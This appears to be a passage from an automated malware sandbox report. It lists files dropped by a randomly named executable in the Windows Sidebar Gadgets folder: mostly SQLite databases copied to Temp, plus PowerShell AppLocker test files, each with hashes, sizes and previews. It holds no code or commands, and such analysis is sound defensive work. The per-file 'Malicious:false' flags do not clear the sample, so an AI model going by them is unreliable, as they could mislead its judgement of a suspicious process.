                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Xr0ESs8hZC

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Xy9T7PDoet

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\YFVJtXGKKF

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Yw1TIhiRXP

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\YxRlsgWsK7

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ZCYnd4b85p

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ZRmoEyOg3P

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ZbjIEDJrOF

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ZiZ69Y8aLL

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Zm6HpHvshC

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Zn0tFyIcVW

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0mxcgfel.dkj.psm1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1l2yiqb1.uvb.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_24gmt0x1.stb.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3fyppsqg.nk5.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4rva32lz.4z4.psm1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhnp1s01.ygj.psm1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ct3d5gj0.ntc.psm1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2saik3y.5tc.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h31xkziu.qwh.psm1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2fkxe5x.fmg.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lgbsajmn.vqg.psm1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
